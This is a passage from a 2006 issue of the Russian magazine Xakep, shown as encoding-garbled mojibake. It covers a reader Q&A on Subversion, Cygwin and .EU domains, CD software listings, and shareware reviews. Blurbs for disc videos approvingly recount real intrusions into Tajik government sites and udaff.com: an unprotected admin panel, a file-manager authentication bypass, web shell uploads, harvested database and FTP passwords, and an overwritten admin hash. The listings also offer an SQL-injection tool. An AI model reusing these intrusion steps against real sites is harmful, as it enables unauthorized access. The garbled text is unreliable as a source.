âíåñåíèÿ èçìåíåíèé. Subversion ïîçâîëÿåò ðåäàêòèðîâàòü ôàéë ñðàçó íåñêîëüêèì ïðîãðàììèñòàì, ïðè÷åì ïîñëå âûïîëíåíèÿ èìè îïåðàöèè Check in, îíà ñàìîñòîÿòåëüíî ñèíõðîíèçèðóåò íåçàâèñèìûå èçìåíåíèÿ è ñîõðàíÿåò â ðåïîçèòàðèé ôàéë ñ äîïîëíåíèÿìè è èñïðàâëåíèÿìè, âíåñåííûìè âñåìè ðàçðàáîò÷èêàìè. ×òîáû íå óäàðèòü â ãðÿçü ëèöîì ïåðåä ðàáîòîäàòåëåì, ðåêîìåíäóþ îçíàêîìèòüñÿ ñ äîêóìåíòàöèåé íà îôèöèàëüíîì ñàéòå (http://subversion.tigris.org) è ïîïðîáîâàòü çàþçàòü ñèñòåìó ñàìîìó, íàñòðîèâ åå ïî ïîäõîäÿùåìó HOWTO (http://gentoo-wiki.com/HOWTO_Subversion). Q:  ÷åì ðàçíèöà ìåæäó UWin, CygWin è MinGW? A: Äàâàé ïî ïîðÿäêó. UWin (www.research.att.com/sw/tools/uwin/) — ýòî ôàêòè÷åñêè ýìóëÿòîð UNIX-ñèñòåì. Óñëîâíî åãî ìîæíî ðàçäåëèòü íà äâå ÷àñòè. Ïåðâàÿ, îíà æå ñàìàÿ âàæíàÿ, ïðåäñòàâëÿåò ñîáîé áèáëèîòåêè è çàãîëîâî÷íûå ôàéëû, â êîòîðûõ ïîëíîñòüþ ðåàëèçîâàí UNIX API. Îíè íåîáõîäèìû äëÿ òîãî, ÷òîáû ìîæíî áûëî êîìïèëèðîâàòü þíèêñîâûå ïðîãðàììû ïîä âèíäó è óñïåøíî èñïîëüçîâàòü èõ. Âòîðàÿ ÷àñòü ïðåäñòàâëÿåò ñîáîé íåïîñðåäñòâåííî ýìóëÿòîð UNIX'à, êîòîðûé ñîäåðæèò

ìíîæåñòâî þíèêñîâûõ óòèëèò, à òàêæå ïðîãðàìì-îáîëî÷åê: bash, csh, zsh. UWin ïîëíîñòüþ ýìóëèðóåò ôàéëîâóþ ñèñòåìó Unix íà NTFS è ÷àñòè÷íî íà FAT/FAT32. Ôàéëîâàÿ ñèñòåìà îòîáðàæàåòñÿ â UWin ñëåäóþùèì îáðàçîì: êîðíåâûì êàòàëîãîì (root, /), â êîòîðîì òû, êàê âñåãäà, íàéäåøü ïðèâû÷íûå /bin, /usr, /lib, /var, /proc è /tmp. Cygwin (www.cygwin.com) — ýòî åùå îäèí ýìóëÿòîð íèêñîâ, íî íàìíîãî áîëåå èçâåñòíûé è ôóíêöèîíàëüíûé. Ðàñïðîñòðàíÿåòñÿ â âèäå îäíîãî- åäèíñòâåííîãî ôàéëà-èíñòàëëÿòîðà, à íóæíûå ïàêåòû âûáèðàþòñÿ èç ñïèñêà è çàêà÷èâàþòñÿ ñ îôèöèàëüíîãî ñàéòà ïðÿìî â ïðîöåññå óñòàíîâêè. Äëÿ òîãî ÷òîáû èìåòü âîçìîæíîñòü êîìïèëèðîâàòü èñõîäíèêè Unix-ïðîãðàìì, íåîáõîäèìî óñòàíîâèòü gcc, íàáîð ñòàíäàðòíûõ áèáëèîòåê è óòèëèòó make. Ïîñëå ýòîãî êîìïèëÿöèÿ áîëüøèíñòâà ïðîãðàìì íå äîëæíà âûçûâàòü ïðîáëåì, ïðè÷åì îòêîìïèëèðîâàííûå ïðèëîæåíèÿ ìîæíî ëåãêî çàïóñêàòü íà ëþáîì äðóãîì êîìïüþòåðå ïðè óñëîâèè òîãî, ÷òî â ïàïêå âèíäû áóäåò ïîìåùåí íåáîëüøîé ôàéë cygwin1.dll. Ïàêåò MinGW (www.mingw.org), â îòëè÷èå îò Cygwin è Uwin, íå ÿâëÿåòñÿ ýìóëÿòîðîì ÎÑ UNIX, íî çàòî ïîçâîëÿåò êîìïèëèðîâàòü þíèêñîâûå ïðîãðàììû ïîä âèíäîé.  ïàêåò âõîäèò âñå íåîáõîäèìîå: êîìïèëÿòîð GCC, óòèëèòà make è íàáîð ñòàíäàðòíûõ ìîäóëåé. Ãëàâíîå äîñòîèíñòâî MinGW çàêëþ÷àåòñÿ â ïðîñòîòå. Äîñòàòî÷íî çàêà÷àòü èç èíåòà îäèí-åäèíñòâåííûé ôàéë, â êîòîðîì ñîáðàíî âñå íåîáõîäèìîå, è êîìïèëÿöèÿ þíèêñîâûõ ïðîãðàìì áóäåò ïðîõîäèòü íà ðàç-äâà. Q: Âîçìîæíî ëè ñåé÷àñ çàðåãèñòðèðîâàòü äîìåí â íîâîé çîíå .EU? A: Ê ñîæàëåíèþ, íåò. Ðåãèñòðàöèåé äîìåíîâ çàíèìàåòñÿ Ìåæäóíàðîäíûé êîíñîðöèóì EURid (www.eurid.eu/en/registrant). Ïðè ýòîì ïðàâî íà áðîíèðîâàíèå äîìåííûõ èìåí ïîêà èìåþò âëàäåëüöû òîðãîâûõ ìàðîê, ïðàâèòåëüñòâåííûå îðãàíèçàöèè è êîìïàíèè. C 7 àïðåëÿ 2006 ãîäà çàðåãèñòðèðîâàòü äîìåí ñìîæåò êàæäûé, êòî æèâåò â ÅÑ èëè èìååò òàì ôèëèàë ñâîåãî áèçíåñà. Èíòåðåñíî, ÷òî çà 15 ìèíóò ñóùåñòâîâàíèÿ äîìåííîé çîíû áûëî ïîäàíî 40 òûñÿ÷ çàÿâîê íà ðåãèñòðàöèþ äîìåíîâ. Òû åùå íàäååøüñÿ çàðåãèñòðèðîâàòü ëàêîìûé sex.eu? :) BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 05


Disco units

_

Íàçâàíèå âèäåî: ÂÇËÎÌ PRESIDENT.TJ

| Nikitos

Ýòî âèäåî äîëæíî áûëî ïîÿâèòüñÿ åùå ìåñÿö íàçàä, íî èç-çà âñåîáùåãî ðàçãèëüäÿéñòâà ìóâèê âûëîæèòü çàáûëè. Èòàê, âçëîì âñåõ ãëàâíûõ ñàéòîâ Òàäæèêèñòàíà. Êàê ýòî áûëî? Íà ñàéòå Íàöèîíàëüíîãî Áàíêà www.nbt.tj áûëà íàéäåíà íåçàïàðîëåííàÿ àäìèíêà www.nbt.tj/en/ admin. Âíóòðè áûëà ññûëêà íà ôàéë-ìåíåäæåð ñ ñåðüåçíûì áàãîì, ïîçâîëÿþùèì îáîéòè àâòîðèçàöèþ, äëÿ ÷åãî ê ñêðèïòó fm.php íàäî áûëî äîáàâèòü ïåðåìåííóþ u ñ èìåíåì íóæíîãî ëîãèíà. ×åðåç áàã â ñêðèïòå áûë ïîäñìîòðåí ïàðîëü ýòîãî ïîëüçîâàòåëÿ, êîòîðûé ñîâïàë ñ ïàññîì îò FTP-àêêàóíòîì (÷òî áûëî âïîëíå îæèäàåìî). Ïî ïðîòîêîëó FTP íà ñàéò áûë çàëèò web-øåëë, ïðè ïîìîùè êîòîðîãî äîâîëüíî áûñòðî áûëè íàéäåíû ïàññâîðäû âñåõ îñòàëüíûõ ïîëüçîâàòåëåé ñåðâåðà, âêëþ÷àÿ ïàðî-

144

ëè äëÿ äîñòóïà ê president.tj. Òóïàê-àäìèíèñòðàòîð çàïèñàë èõ â êîììåíòàðèÿõ ê êîíôèãó FTP-ñåðâèñà proftpd :). Ýòî åùå îäíî íàãëÿäíîå äîêàçàòåëüñòâî, ÷òî â ãîñóäàðñòâåííûõ îðãàíàõ çà÷àñòóþ ðàáîòàþò íåêîìïåòåíòíûå ëè÷íîñòè :).

Íàçâàíèå âèäåî: ÂÇËÎÌ ÓÄÀÂÀ

| mag

 ýòîì âèäåî õàêåð êîâûðÿåò ïàäîíêàôñêèé îíëàéí-ðåñóðñ udaff.com.  ñàìîì íà÷àëå ðîëèêà îí îáíàðóæèâàåò, ÷òî íîâîñòíîé ñêðèïò ïðè «ïðàâèëüíîé» ýêñïëóàòàöèè ìîæåò âûâîäèòü ïåðâûå N ñòðîê ïðîèçâîëüíîãî ôàéëà íà ñåðâåðå. Íî ýòî åãî íå óñòðîèëî, è îí ðåøèë êîïàòüñÿ äàëüøå. Äëÿ òîãî ÷òîáû ïîëó÷èòü ïîëíûé ñïèñîê ñêðèïòîâ, íàõîäÿùèõñÿ íà ñåðâåðå, îí çàïðÿã Google èñêàòü âñå PHP-ôàéëû íà óäàâå. È ðåçóëüòàò îïðàâäàë ñâîè îæèäàíèÿ! Íà ñàéòå îáíàðóæèëñÿ çàáðîøåííûé ôîðóì phpBB (äóìàëè — ñïðÿ÷óò. Ðàçáåæàëèñü, îò áîëüøîãî áðàòà â ëèöå Google íå óéòè!) ñòàðîé âåðñèè, êîòîðûé ñòðàäàåò íàøóìåâøåé îøèáêîé, ñ ïîìîùüþ êîòîðîé ñ ëåãêîñòüþ ìîæíî ëåãêî ïîëó÷èòü øåëëäîñòóï ê ñèñòåìå. Ïîëó÷èâ øåëë-àêöåñ, õàêåð ïåðâûì äåëîì èùåò äîñòóïíóþ äëÿ çàïèñè äèðåêòîðèþ, ÷òîáû çàëèòü òóäà çíàêîìûé âñåì r57shell. Îòêðûâ îäèí èç ôàéëîâ êîíôèãóðàöèè,

íàø âçëîìùèê îáíàðóæèâàåò â íåì ïàðîëü îò postgresql-áàçû. Ñëèâ, óñòàíîâèâ è íàñòðîèâ “phpPgAdmin, õàêñîð óñïåøíî ïðîíèêàåò â ÁÄ óäàâà. Ïîñëå ýòîãî îí ìåíÿåò õýø ïàðîëÿ àäìèíèñòðàòîðà íà ñâîé, â ðåçóëüòàòå ÷åãî ñàì ñòàíîâèòñÿ àäìèíîì ;).

Íàçâàíèå âèäåî: CYGWIN | www.cygwin.com ×òî áóäåò äåëàòü õàêåð, åñëè ïîä ðóêàìè ó íåãî âäðóã íå îêàæåòñÿ *nix-øåëëà, à ñåðâàê îáÿçàòåëüíî íóæíî ïîðóòàòü remote-exploit'îì? Áüþñü îá çàêëàä, ÷òî ñ ïîäîáíîé ñèòóàöèåé òû ñòàëêèâàëñÿ íå ðàç. È âîçìîæíî, äàæå íå ñìîã ðåøèòü åå, à âûõîä èç ïîëîæåíèÿ áûë ðÿäîì. Ðåàëüíî ïîìî÷ü â äàííîé ñèòóàöèè ìîæåò èçóìèòåëüíûé ïàêåò cygwin. Åñëè ãîâîðèòü êðàòêî, òî ïîìîæåò Linux, êîòîðûé ðàáîòàåò ïîä Windows. Ðàçðàáîò÷èêè ïîëíîñòüþ àäàïòèðîâàëè API ëèíóêñà ïîä âèíäó, ïîýòîìó cygwin ïîçâîëÿåò êîìïèëèðîâàòü â îáû÷íûå exe’øíèêè ïðîãðàììû, èçíà÷àëüíî ïðåäíàçíà÷åííûå äëÿ íèêñîâ. È ñàìîå ãëàâíîå — èõ ìîæíî çàïóñêàòü íà ëþáîé âèíäîâîé òà÷êå. BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06


MISC AbiWord 2.4.1 Audio Tag Tool 0.12.2 Beagle 0.1.4

DEVELOPMENT Development Bluefish 1.0.4 Code Forge IDE 4.5 Gambas 1.0.13 MDB Tools 0.6pre1 Qt 4.1.0 Ruby 1.8.4 SXEmacs 22.1.3 Zend Optimizer 2.6.0

UNIX

MISC AbiWord 2.4.1 Amazing Desktop v 2.0 AutoMate 6 Chimera Virtual Desktop 1.3.6 CopyRator 1.5 DAMN NFO Viewer 2.10.0032.RC3 ERUNT 1.1j Foxit PDF Reader 1.3 Frigate 3.33

DEVELOPMENT .Development Hex Workshop 4.23 Microsoft SQL Server 2005 Express 9.00.1399 Negatory Assembly Studio 1.0 Nvu 1.0PR Russian Olly 1.10 Special Edition Ruby-mswin32 1.8.3 SQL Balance for MySQL 1.7.1 SQL Manager 2005 for SQL Server Visual C++ 2005 Zend Optimizer 2.6.0

evince-0.4.0 File Roller 2.12.1 Gammu 1.03.20 gqview-2.0.1 htop v0.5.4 KDocker 1.3.0 KRename 3.0.9 KXDocker 0.39 Midnight Commander 4.6.0 Phone Manager 0.6 PwManager 1.2.4 Qalculate 0.9.2 SnapAll-0.1 Tux Commander 0.5.70 xsane-0.98b

MULTIMEDIA 3D Studio Max 7.0 BSPlayer 1.37.826 CrazyTalk v 4.0 Media Studio DivX Dr. DivX 2.0 Beta 3 Elecard Mobile Converter v 1.2

FrontMotion Login v1.1.5.293 Hoo WinTail 3.2 Build 539 Keyboard LaunchPad 1.0 Locate 3.0 Beta 5 MagicISO 5 MediaMonkey 2.4 Message Smuggler 1.80.10 NASA World Wind 1.3.3.1 Photocopier 3.02 PhotoWatermark 6.0.8.2 pMetro Screenshot Captor 2.07.01 SearchInform 1.7 SiSoftware Sandra 2005.SR3 (10.69) SoftBase 2.1.1 SpyAgent 5.37 XPlorer 0.50.113

WINDOWS

NET aMule 2.0.3

MULTIMEDIA Audacity 1.2.4 Blender 2.40 drip-0.9.0 Grip v3.2.0 Hugin 0.5 Inkscape 0.43 ogle-0.9.2 Photo Organizer 2.28 RealPlayer 10 vlc 0.8.4a XnView v1.70

NET &RQ Black Rat IM v.1019 Backup Watcher for MySQL 1.9.0 BlackICE PC Protection 3.6 CurrPorts v1.07

FireGraphic 8.5.810 Font Fitting Room Fraps 2.7.2 IconX 1.1 Media Player Classic 6.4.8.7 Mixcraft 2.01 Mobile Ringtone Converter 2.3.12 MyTheatre 3.33.5 NeroVision Express 3.1.0.21 Paint Shop Pro 10.02 Recolored 0.6.0 Beta Sony Sound Forge Audio Studio v8.0a Build 63 Sothink SWF Quicker 2.0 RC VideoCharge 3.3 VueScan 8.3 Winamp 5.12 X Codec Pack 1.9.9.305

Eggdrop 1.6.17 Gajim 0.9 Galeon 2.0 gurlchecker 0.8.3 KTorrent 1.1 RC1 Mail Notification 2.0 mICQ 0.5.0.4 Nessus-2.2.6 OpenProtect 5.0.4 Php Gmail Drive 0.3.2 PHPwebmail 2.3 SHOUTcast Server 1.9.5 SIM 0.9.3 X-Lite Yahoo Messenger 1.0.4

CyD NET Utils 4.1 EncrediMail XE Firefox 1.5 Free Download Manager 1.9 HiDownload Pro HydraIRC 0.3.151 LanScope 2.9.1 LanSpy 2.0 Local Website Archive 1.23 Mumble 0.9.2 Offline Explorer Pro 4.0 Omea Reader 2.0 Opera's DC++ (oDC++) 5.31 Outpost Firewall PRO 3.0 pcAnywhere 12.0 Beta RSS Builder Skype 2.0.0.63 SmartCode VNC Manager 3.0.27.1 SmartFTP 1.5.991.24 Traffic Inspector PE 1.1.3.1711 Trillian 3.1 WebSite-Watcher 4.05 WinSCP 3.8 XSpider 7 Zebra Soft Phone

SYSTEM Apache Xindice 1.0 Fluxbox 0.1.14 grub 1.92 GWhere 0.2.1 Iozone 3.257 KDE 3.5.0 Kernel LILO 22.7.1 OpenBSD 3.8 i386 PearPC 0.4.0 Rootkit Hunter 1.2.7 SMBNetFS 0.3.0 X.org

SYSTEM Active UNDELETE v 5.1 Cygwin DAEMON Tools 4.00 DirectX 9.0c DirectX Rollbacker 0.35 Diskeeper 10 DiskLogon 2.5.1.1 Intel Desktop Control Center 2.0.00.18 Kaspersky Anti-Hacker 1.8.180 Kaspersky Personal Security Suite 1.1 MultiSet 1.9 Panda Titanium Antivirus 2006 PearPC 0.4.0 PentaSuite 8.1.1.131 QDS Security Toolkit 0.6.39 S&M 1.7.6 Second Copy 7 Shutdown Lock v 1.5 System Mechanic 6 Professional WindowBlinds 5 WinGuard Pro 2006 XAMPP Windows 1.5.0-pl1

¹ 01(85) ßÍÂÀÐÜ 2006

x


¹ 01(85) ßÍÂÀÐÜ 2006 x

CD1

Hoo WinTail 3.2 Build 539 Keyboard LaunchPad 1.0 Locate 3.0 Beta 5 MagicISO 5 MediaMonkey 2.4 Message Smuggler 1.80.10 Photocopier 3.02 PhotoWatermark 6.0.8.2 pMetro Screenshot Captor 2.07.01 SearchInform 1.7 SoftBase 2.1.1 SpyAgent 5.37 XPlorer 0.50.113

Recolored 0.6.0 Beta VideoCharge 3.3 VueScan 8.3 Winamp 5.12 X Codec Pack 1.9.9.305

MISC AbiWord 2.4.1 Amazing Desktop v 2.0 Chimera Virtual Desktop 1.3.6 CopyRator 1.5 DAMN NFO Viewer 2.10.0032.RC3 ERUNT 1.1j FrontMotion Login

NET &RQ Black Rat IM v.1019 Backup Watcher for MySQL BlackICE PC Protection 3.6 CurrPorts v1.07 CyD NET Utils 4.1 EncrediMail XE Firefox 1.5 Free Download Manager 1.9 MULTIMEDIA HiDownload Pro BSPlayer 1.37.826 HydraIRC 0.3.151 Dr. DivX 2.0 Beta 3 LanScope 2.9.1 Elecard Mobile Converter v 1.2 LanSpy 2.0 Font Fitting Room Local Website Archive 1.23 Fraps 2.7.2 Mumble 0.9.2 IconX 1.1 Offline Explorer Pro 4.0 Media Player Classic 6.4.8.7 Omea Reader 2.0 Opera's DC++ (oDC++) 5.31 Mobile Ringtone Converter

SXEmacs 22.1.3 MISC Audio Tag Tool 0.12.2 Beagle 0.1.4 evince-0.4.0 File Roller 2.12.1 Gammu 1.03.20

htop v0.5.4 KDocker 1.3.0 KRename 3.0.9 KXDocker 0.39 Midnight Commander 4.6.0 Phone Manager 0.6 PwManager 1.2.4

Qalculate 0.9.2 SnapAll-0.1 SVG Icons 0.3.0 Tux Commander 0.5.70

WINDOWS DEVELOPMENT Development Hex Workshop 4.23 Negatory Assembly Studio 1.0 Nvu 1.0PR Russian Olly 1.10 Special Edition Ruby-mswin32 1.8.3 SQL Balance for MySQL 1.7.1 SQL Manager 2005 for SQL Server

Outpost Firewall PRO 3.0 pcAnywhere 12.0 Beta RSS Builder SmartFTP 1.5.991.24 Traffic Inspector PE WebSite-Watcher 4.05 WinSCP 3.8 XSpider 7 Zebra Soft Phone SYSTEM Active UNDELETE v 5.1 DAEMON Tools 4.00 DirectX Rollbacker 0.35 DiskLogon 2.5.1.1 Kaspersky Anti-Hacker 1.8.180 PearPC 0.4.0 QDS Security Toolkit 0.6.39 S&M 1.7.6 Second Copy 7 Shutdown Lock v 1.5 WindowBlinds 5 WinGuard Pro 2006

UNIX DEVELOPMENT Bluefish 1.0.4 Code Forge IDE 4.5 Gambas 1.0.13 MDB Tools 0.6pre1 Qt 4.1.0 Ruby 1.8.4

MISC AbiWord 2.4.1

¹ 01(85) ßÍÂÀÐÜ 2006

Amazing Desktop v 2.0 Chimera Virtual Desktop 1.3.6 CopyRator 1.5 DAMN NFO Viewer ERUNT 1.1j FrontMotion Login Hoo WinTail 3.2 Build 539

x

CD2

UNIXWAREZ Accelerando 0.4 Downloader for X 2.5.6 GnoCHM 0.9.6 Hddtemp 0.3 KWave 0.7.4 Lineak 0.8.1 TiMidity++ 2.13 X-TOOLZ Automagic SQL Injector MD5MD4 Collision Generation Restorator 2005 Resource Editor RootkitRevealer 1.6 ØÀÐÎWAREZ AAshampoo Magic Defrag 1.06 Atnotes 9.5 CDCheck 3.1.8.1b Flash Recovery 1.5 Girder 4.0 Beta 15

IMCourier 2.0 ImTOO DVD to PSP Suite 2.1.55.1107b KeePass 1.03 LinkSync 2.0 Beta 2b Mp3Tag Studio 3.5 nLite v1.0 RC4 Semagic 1.5.6.3 SharePod 1.7 Vlog It! 2.5.1644.0 Beta Weather Watcher 5.6.5 VISUAL HACK ++ Ïðåçèäåíòñêèé âçëîì Âçëîì óäàâà Ïðîõîæäåíèå äåêàáðüñêîãî êîíêóðñà UPDATES Áåñïëàòíàÿ âåðñèÿ DrWeb äëÿ ÷èòàòåëåé æóðíàëà Õàêåð Áàçû äëÿ Àíòèâèðóñà Êàñïåðñêîãî Çàïëàòêè äëÿ Windows


CENTNER OSMIUM

centner@real.xakep.ru; www.livejournal.com/~onepamop

osmium@itsme.ru

_units

SHAROWARES

Atnotes

Îïå÷àòêà

Âåðñèÿ: 9.5 îò 14.09.2005 Îïåðàöèîííàÿ ñèñòåìà: Windows 98, Me, NT, 2000, XP Ðàñïðîñòðàíåíèå: áåñïëàòíî Ðàçìåð: 708 Êá Ñêà÷àòü: http://atnotes.fr.st

Âåðñèÿ: 2.711 îò 03.09.2002 (ñòàðàÿ, íî äîáðàÿ) Îïåðàöèîííàÿ ñèñòåìà: Windows 98, Me, NT, 2000, XP Ðàñïðîñòðàíåíèå: áåñïëàòíî Ðàçìåð: 36 Êá Ñêà÷àòü: http://212.5.101.38/snoop.htm

Ñëó÷èëîñü ìíå ëåòîì ïî÷èñòèòü ñâîé ìîíèòîð îò âñÿêîé íàêîïèâøåéñÿ ïûëè. Ïåðåä òåì êàê ïðîòåðåòü ýêðàí ñïåöòðÿïî÷êîé, ÿ îáîäðàë ñ íåãî òîííû æåëòûõ ëèïêèõ ëèñòî÷êîâ, íà êîòîðûõ áûëè íàïèñàíû òåëåôîíû, àäðåñà, èìåíà è ãëîáàëüíûå ñîáûòèÿ, äà è ïîâûêèäûâàë âñå. Öåëûé âîðîõ ëèñòî÷êîâ. Íàäîåëè, ïîðà ïåðåõîäèòü íà ýëåêòðîííûå ñòèêåðû. Çàáðàëñÿ â Èíòåðíåò, íàêà÷àë ñîîòâåòñòâóþùèõ ïðîãðàìì è îñòàíîâèëñÿ íà îäíîé. Atnotes åå ôàìèëèÿ. Ïðîãðàììà âèñèò â òðåå, ïðè íåîáõîäèìîñòè çàïðîñòî èç íåãî èçâëåêàåòñÿ, ïîçâîëÿÿ ñîçäàòü ñïåöçàïèñî÷êó, íàñòðîèâ öâåò, øðèôò è âñå îñòàëüíîå. Îòëè÷íàÿ ôè÷à — íàñòðàèâàíèå ñòèêåðà òàêèì îáðàçîì, òåïåðü îí áóäåò íåâèäèìûì äî íàçíà÷åííîãî âðåìåíè, à ïîòîì ïîÿâèòñÿ, íå çàíèìàÿ ìåñòî íà ðàáî÷åì ñòîëå. Äëÿ îñîáî çàáûâ÷èâûõ: ê êàæäîìó ñòèêåðó ìîæíî ïðèêðóòèòü â ïàðó êëèêîâ çâóêîâîé ñèãíàë è/èëè íàñòîé÷èâîå ìèãàíèå. Êàëåíäàðü, ãîðÿ÷èå êëàâèøè è ïðî÷èå íàñòðîéêè (íå òàê, ÷òîáû óæ î÷åíü íåîáõîäèìûå, íî èìåþùèåñÿ â íàëè÷èè) ïðèñóòñòâóþò. Èíôîðìàöèÿ, êîòîðàÿ íå ñèñòåìàòèçèðîâàíà, ÿâëÿåòñÿ îáû÷íîé ñâàëêîé, â òîì ÷èñëå è ñâàëêîé íà âèðòóàëüíîì ðàáî÷åì ñòîëå.  ñëó÷àå, åñëè çàïèñåé ñòàíåò ÷ðåçìåðíî ìíîãî, òî îòöàì ðóññêîé ôèëîñîôñêîé ìûñëè ïîìîæåò ïîèñê äàëåêîãî ïðîøëîãî â áàçå ñòèêåðîâ. Ýòî ïðîãðàììà èç ðàçðÿäà must have. Óäîáíàÿ è áåñïëàòíàÿ. Âàæíî! Àâòîð ïî÷åìó-òî ïðåêðàòèë ïîääåðæèâàòü ñâîþ ïðîãðàììó, íî õóæå îíà îò ýòîãî íå ñòàëà. Íà îôèöèàëüíîé ñòðàíèöå ïðîãðàììû ñêà÷àòü íè÷åãî íåëüçÿ, ïîòîìó âûêëàäûâàþ äëÿ âñåõ æåëàþùèõ âåðñèþ Atnotes 9.5 âîò ñþäà: http://rapidshare.de/files/8802567/atnsetup95.rar.html

Ãðàæäàíàì, íàáèðàþùèì âñÿêèå òåêñòû êèëîáàéòàìè, íàâåðíÿêà èçâåñòåí òàêîé ñîôòâåðíûé õèò, êàê Punto Switcher. Îòëè÷íûé ïîìîùíèê è âåðíûé äðóã, õîòÿ è ïîäâåë ìåíÿ ðàçîê. Ïèñàë ÿ íà ðàáîòå áëàãîäàðñòâåííîå ïèñüìî, çàêàí÷èâàÿ åãî ôðàçîé «ñèëüíî-ñèëüíî áëàãîäàðþ Âàñ.» Êàê-òî òàê ïîëó÷èëîñü, ÷òî âìåñòî òî÷êè òîâàðèù Punto Switcher âñòàâèë áóêâó «þ», è ïðèøëîñü ìíå ïîòîì îáúÿñíÿòü, êòî òàêîé Âàñÿ è ÷òî îí òàêîãî ñäåëàë :).  îáùåì, â ïàðå ñ Punto Switcher ðàáîòàåò ó ìåíÿ áåññìåííî ïðîãðàììà îòå÷åñòâåííîãî àâòîðà «Îïå÷àòêà». ß åå çàðÿäèë â âèíäîâóþ àâòîçàãðóçêó è ïîëüçóþñü ñ óäîâîëüñòâèåì. Èòàê, ïðîãðàììà «Îïå÷àòêà» èçíà÷àëüíî áûëà ïðåäíàçíà÷åíà äëÿ òåõ, êòî ÷àñòî çàáûâàåò ïåðåêëþ÷àòüñÿ ìåæäó ðàñêëàäêàìè êëàâèàòóðû è íàáèðàåò òåêñòû âðîäå «Ghbdtn? djn b z!», ÷òî íà ñàìîì äåëå äîëæíî áûëî îçíà÷àòü «Ïðèâåò, âîò è ÿ!» Òàêèå íåñ÷àñòëèâöû òåïåðü ìîãóò âûäåëèòü íåïðàâèëüíûé ââîä â îêîøêå, è ïî íàæàòèþ «âîëøåáíîé» êíîïêè îí ïðåâðàòèòñÿ â ïðàâèëüíûé. Êîíêðåòíàÿ êíîïêà îïðåäåëÿåò ñïîñîá ïåðåâîäà: â ñòàíäàðòå ScrollLock — ýòî ìåæäóÿçûêîâîé ïåðåâîä, Pause — áîëüøèå â ìàëåíüêèå, è íàîáîðîò. Òåïåðü ïðîãðàììà ïîçâîëÿåò ïðîèçâîäèòü íå òîëüêî ïåðåêîäèðîâêó «îäèí ñèìâîë» — «äðóãîé ñèìâîë» è, íàïðèìåð, âûïîëíÿòü òðàíñëèòåðàöèþ, íî è âîîáùå âûïîëíÿòü ëþáûå äåéñòâèÿ ïî íàæàòèþ ãîðÿ÷åé êëàâèøè. Äëÿ ýòîãî â ïðîãðàììå åñòü ìåõàíèçì plugin'îâ (âíåøíèõ ìîäóëåé). Äàæå ñòàíäàðòíûé ïåðåâîä QWERTY-ÉÖÓÊÅÍ âûïîëíåí â âèäå òàêîãî plugin'à. Êà÷àéòå è àâòîçàãðóæàéòå.

XÀÊÅÐ 01 /85/ 06

Ashampoo Magic Defrag Âåðñèÿ: 1.06 îò 10.10.2005 Îïåðàöèîííàÿ ñèñòåìà: Windows 2000, XP, 2003 Server Ðàñïðîñòðàíåíèå: $12.99 (áåñïëàòíî 30 äíåé) Ðàçìåð: 3,4 Ìá Ñêà÷àòü: www.ashampoo.com/frontend/ products/php/product.php?session_langid=2&idstring=0044

147


Äåôðàãìåíòàöèÿ æåñòêèõ äèñêîâ — íàøå âñå! Ðàíüøå äåôðàãìåíòàòîðîì íîìåð îäèí äëÿ ãðàìîòíûõ ïîëüçîâàòåëåé áûë Norton, à ñåé÷àñ ïðîãðàììû òàêîé íàïðàâëåííîñòè ðàñïëîäèëèñü. Êà÷åñòâî èõ ðàáîòû ïðèìåðíî îäèíàêîâî, ïîýòîìó áûëî ïðèíÿòî ðåøåíèå îñòàíîâèòüñÿ íà òàêîì ïðåäñòàâèòåëå ñëàâíîé ïëåÿäû äåôðàãìåíòàòîðîâ, êàê Ashampoo Magic Defrag. Ïðåèìóùåñòâà ïðîãðàììû çàêëþ÷àþòñÿ â íåáîëüøîé íàãðóçêå íà ñèñòåìó è íåçàìåòíîñòè â ðàáîòå. Ïðîãðàììà íåïîñèëüíî òðóäèòñÿ â òå ìîìåíòû, êîãäà ñèñòåìà è ïîëüçîâàòåëü îòäûõàþò. Ashampoo Magic Defrag èñïîëüçóåò ôîíîâûé ðåæèì: ìîíèòîðèò ñèñòåìó íà ïðåäìåò çàãðóæåííîñòè îïåðàöèÿìè è, åñëè òàêèõ íå ïðîèñõîäèò ÷åðåç ïàðó äåñÿòêîâ ñåêóíä, òî Ashampoo Magic Defrag âêëþ÷àåòñÿ â ðàáîòó. Òî åñòü âñÿ äåôðàãìåíòàöèÿ äèñêîâ ïðîèñõîäèò íà ëåòó. Ïðîôèëàêòèêà ëó÷øå ëå÷åíèÿ :). Ðàçóìååòñÿ, íàñòðîèòü ïðîãðàììó ìîæíî ðóêàìè, òàê êàê îïöèé â íåé íåìíîãî. Þçàþùèì íîóòáóêè, ãäå êðèòè÷åí çàðÿä áàòàðåè, ïðåäëàãàåòñÿ îáðàòèòü âíèìàíèå íà ñëåäóþùèé ôàêò: åñëè íîóò âûäåðíóò èç ðàçåòêè è ïèòàåòñÿ îò àêêóìóëÿòîðà, òî Ashampoo Magic Defrag îòêëþ÷àåòñÿ, ýêîíîìÿ ýíåðãèþ íîóòáó÷íîé áàòàðåè. Îòäåëüíîå âíèìàíèå óäåëÿåòñÿ ìîãó÷èì àäìèíàì: «Íîâûå òåõíîëîãèè è èíòåëëåêòóàëüíûå èíñòðóìåíòû ïîçâîëÿò íå èñïûòûâàòü íè ìàëåéøèõ çàòðóäíåíèé ïðè ðàáîòå ñ ïðîäóêòîì Ashampoo Magic Defrag. Äëÿ ñîçäàíèÿ íîâîãî ãðàôèêà, â ñîîòâåòñòâèè ñ êîòîðûì áóäåò âûïîëíÿòüñÿ äåôðàãìåíòàöèÿ è íàñòðîéêè âñåõ åãî ïàðàìåòðîâ, äîñòàòî÷íî íåñêîëüêèõ ùåë÷êîâ êíîïêîé ìûøè.» À ÷òî äëÿ àäìèíà õîðîøî, òî è ïðîñòîìó þçåðó ñ ïðÿìûìè ðóêàìè ïîéäåò íà ïîëüçó.

